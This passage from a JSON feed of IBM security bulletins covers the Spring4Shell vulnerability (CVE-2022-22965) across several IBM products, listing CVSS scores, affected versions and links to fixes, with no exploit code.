TPS\"},\"Product\":{\"code\":\"SS6PEW\",\"label\":\"Sterling Order Management\"},\"ARM Category\":[{\"code\":\"a8m0z000000cy00AAA\",\"label\":\"Orders\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-19T21:24:49", "type": "ibm", "title": "Security Bulletin: Sterling Order Management and Spring vulnerability CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-19T21:24:49", "id": "EF2166DB5EE8BD87E1440D3823C327B8BCA46A3FD349720520FD40C591911F30", "href": "https://www.ibm.com/support/pages/node/6572485", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-21T05:43:57", "description": "## Summary\n\nIBM Cognos Command Center is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in IBM Cognos Command Center as a direct dependency of ActiveMQ. IBM Cognos Command Center 10.2.4.1 has upgraded to ActiveMQ 5.17.1 which uses Spring 5.3.19. ActiveMQ 5.17.1 requires Java 11 as a minimum version, therefore IBM Cognos Command Center has upgraded to IBM\u00ae Semeru JRE 11.0.14.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Command Center 10.2.4.1\n\n## Remediation/Fixes\n\nIt is strongly recommended that you apply the most recent security update:\n\n[IBM Cognos Command Center 10.2.4 Fix Pack 1 IF16](<https://www.ibm.com/support/pages/node/6890671>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-01T20:05:48", "type": "ibm", "title": "Security Bulletin: IBM Cognos Command Center is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-03-01T20:05:48", "id": "A871939B5F51CA69B0EDBC21D1816A26D5E84C73FB45D47DF354F899F5F6BB9B", "href": "https://www.ibm.com/support/pages/node/6590487", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:04:57", "description": "## Summary\n\nIBM Planning Analytics Workspace is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in IBM Planning Analytics Workspace in Server Side Rest APIs as an indirect dependency by MongoDB that is used to store content. IBM Planning Analytics Workspace includes Spring 5.2.20. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Planning Analytics Workspace 2.0\n\n## Remediation/Fixes\n\nIt is strongly recommended that you apply the most recent security updates:\n\n[Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 76 from Fix Central](<https://www.ibm.com/support/pages/node/6584994> \"Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 76 from Fix Central\" ) \n \n\n\nThis Security Bulletin is applicable to IBM Planning Analytics 2.0 on premise offerings. This has been addressed on IBM Planning Analytics with Watson and no further action is required.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-17T16:21:25", "type": "ibm", "title": "Security Bulletin: IBM Planning Analytics Workspace is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-17T16:21:25", "id": "E0AC0F2CEF0686FD5D35D040E442195982E92EF98BDFD841F5F62D37D0337B68", "href": "https://www.ibm.com/support/pages/node/6586658", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:01:27", "description": "## Summary\n\nIBM Sterling B2B Integrator is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used in the web application. Updated Spring library will be shipped in upcoming fix pack.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1 \n \n## Remediation/Fixes\n\n**Product(s)**| **Version(s)**| **Remediation/Fix \n** \n---|---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1| We have released 6.1.2.0 with non-vulnerable spring framework jars that can be downloaded from Passport Advantage \n \n## Workarounds and Mitigations\n\nIBM Sterling B2B Integrator is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Out of an abundance of caution, we will upgrade Spring Framework in our future release.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T20:07:31", "type": "ibm", "title": "Security Bulletin: IBM Sterling B2B Integrator is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-08-03T20:07:31", "id": "8F4CAEB4814182DEBFBE7DFCA9FC13E3577204C307181835FA0E1CA012CAD9E1", "href": "https://www.ibm.com/support/pages/node/6570975", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T05:50:14", "description": "## Summary\n\nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used in Watson Speech Services with embeedded Tomcat to build our STT and TTS java web services. The current fix includes Spring v5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data | 4.0.0 - 4.0.6 \n \n\n\n## Remediation/Fixes\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \n**IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data **| ** 4.0.7 **| **The fix in 4.0.7 applies to all versions listed (4.0.0-4.0.6). Version 4.0.7 can be downloaded and installed from: \n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=installing-cloud-pak-data> \n** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-12T21:59:00", "type": "ibm", "title": "Security Bulletin: IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-12T21:59:00", "id": "EB58ABDFAA1D2A9C4F164D6FC9FD899843DF1F1028ECDA035A0F0C34CD298FAD", "href": "https://www.ibm.com/support/pages/node/6583151", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:21", "description": "## Summary\n\nIBM Sterling Connect:Direct for Microsoft Windows is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring 2.6.6.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Connect:Direct for Microsoft Windows| 6.2.0.0 - 6.2.0.3_iFix012 \n \n\n\n## Remediation/Fixes \n \n--- \nIBM recommends addressing the possible vulnerability now by upgrading. **Affected Product(s)**| **Version(s)**| **APAR \n**| **Remediation / First Fix \n** \n---|---|---|--- \nIBM Sterling Connect:Direct for Microsoft Windows| 6.2| None| Apply [6.2.0.4](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%20software&product=ibm/Other+software/Sterling+Connect%3ADirect+for+Microsoft+Windows&release=6.2.0.4&platform=All&function=fixId&fixids=6.2.*.*-IBMConnectDirectforMicrosoftWindows-x64-fp*> \"6.2.0.4\" ), available on Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T12:12:42", "type": "ibm", "title": "Security Bulletin: IBM Sterling Connect:Direct for Microsoft Windows is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-11T12:12:42", "id": "9559CE1CF845BE27801B9A76018F0E7FFBD3159BCFFEE9D25526E6D24FA5F367", "href": "https://www.ibm.com/support/pages/node/6584984", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:32", "description": "## Summary\n\nIBM Watson Knowledge Catalog in Cloud Pak for Data is potentially vulnerable to arbitrary code execution due to Java Spring data binding vulnerability (CVE-2022-22965).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Knowledge Catalog on-prem| 3.5.1 \nIBM Watson Knowledge Catalog on-prem| 4.0 \n \n\n\n## Remediation/Fixes\n\n** IBM strongly recommends addressing the vulnerability now by upgrading. **\n\nInstall Watson Knowledge Catalog 4.0.8 (Refresh 8) or above: <https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=new-watson-knowledge-catalog>\n\nInstall Watson Knowledge Catalog 3.5.10 (Refresh 13) or above: <https://www.ibm.com/docs/en/cloud-paks/cp-data/3.5.0?topic=new-watson-knowledge-catalog>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-06T16:01:59", "type": "ibm", "title": "Security Bulletin: Java Spring vulnerability impacts IBM Watson Knowledge Catalog in Cloud Pak for Data (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-06T16:01:59", "id": "D9E06E5C382B357DD50008C0D277DB7D1B6D088C158C56C3D022303F1DFC00A4", "href": "https://www.ibm.com/support/pages/node/6583465", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:03:31", "description": "## Summary\n\nIBM Spectrum Symphony is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. IBM Spectrum Symphony includes Spring Framework related classes in the package. It impacts the WEBGUI, REST and HostFactory components. The fix upgrades spring framework into 5.2.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Symphony| 7.3 \nIBM Spectrum Symphony| 7.3.1 \nIBM Spectrum Symphony| 7.3.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Symphony| 7.3| \n\nP104637\n\nP104651\n\nP104653\n\nP104656\n\nP104676\n\nP104677\n\n| \n\n[sym-7.3-build601113](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601113&includeSupersedes=0> \"sym-7.3-build601113\" )\n\n[sym-7.3-build601128](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601128&includeSupersedes=0> \"sym-7.3-build601128\" )\n\n[sym-7.3-build601137](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601137&includeSupersedes=0> \"sym-7.3-build601137\" )\n\n[sym-7.3-build601138](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601138&includeSupersedes=0> \"sym-7.3-build601138\" )\n\n[sym-7.3-build601161](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601161&includeSupersedes=0> \"sym-7.3-build601161\" )\n\n[sym-7.3-build601162](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601162&includeSupersedes=0> \"sym-7.3-build601162\" ) \n \nIBM Spectrum Symphony| 7.3.1| \n\nP104630\n\nP104643\n\nP104644\n\nP104645\n\nP104649\n\nP104650\n\n| \n\n[sym-7.3.1-build601108](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601108&includeSupersedes=0> \"sym-7.3.1-build601108\" )\n\n[sym-7.3.1-build601120](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601120&includeSupersedes=0> \"sym-7.3.1-build601120\" )\n\n[sym-7.3.1-build601122](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601122&includeSupersedes=0> \"sym-7.3.1-build601122\" )\n\n[sym-7.3.1-build601124](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601124&includeSupersedes=0> \"sym-7.3.1-build601124\" )\n\n[sym-7.3.1-build601125](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601125&includeSupersedes=0> \"sym-7.3.1-build601125\" )\n\n[sym-7.3.1-build601126](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601126&includeSupersedes=0> \"sym-7.3.1-build601126\" ) \n \nIBM Spectrum Symphony| 7.3.2| \n\nP104634\n\nP104654\n\nP104670\n\nP104671\n\nP104678\n\nP104679\n\n| \n\n[sym-7.3.2-build601111](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601111&includeSupersedes=0> \"sym-7.3.2-build601111\" )\n\n[sym-7.3.2-build601143](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601143&includeSupersedes=0> \"sym-7.3.2-build601143\" )\n\n[sym-7.3.2-build601154](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601154&includeSupersedes=0> \"sym-7.3.2-build601154\" )\n\n[sym-7.3.2-build601155](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601155&includeSupersedes=0> \"sym-7.3.2-build601155\" )\n\n[sym-7.3.2-build601164](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601164&includeSupersedes=0> \"sym-7.3.2-build601164\" 